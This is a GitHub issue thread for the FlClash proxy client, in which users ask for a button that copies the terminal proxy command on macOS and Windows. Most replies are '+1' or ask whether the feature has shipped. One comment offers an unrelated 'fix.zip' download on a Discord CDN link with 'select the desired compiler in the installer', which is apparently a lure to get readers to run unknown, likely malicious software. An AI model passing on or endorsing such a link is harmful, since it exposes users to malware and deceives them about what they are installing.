### ISSUE TITLE
优化点希望增加复制终端代理命令

### ISSUE THREAD

**Issue by aishuaikang** [chen08209/FlClash#332]
![image](https://github.com/user-attachments/assets/ac6ec3f5-8eb0-4495-9a72-1b6b62f167e7)
mac中需要一个这个功能 ，当然windows也需要

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by azhu003** [comment]
+1

**Comment by RYGRIT** [comment]
+1

**Comment by rzshuo** [comment]
+1

**Comment by zhoufeifan-meeboss** [comment]
解决了么，我看还是没有入口啊
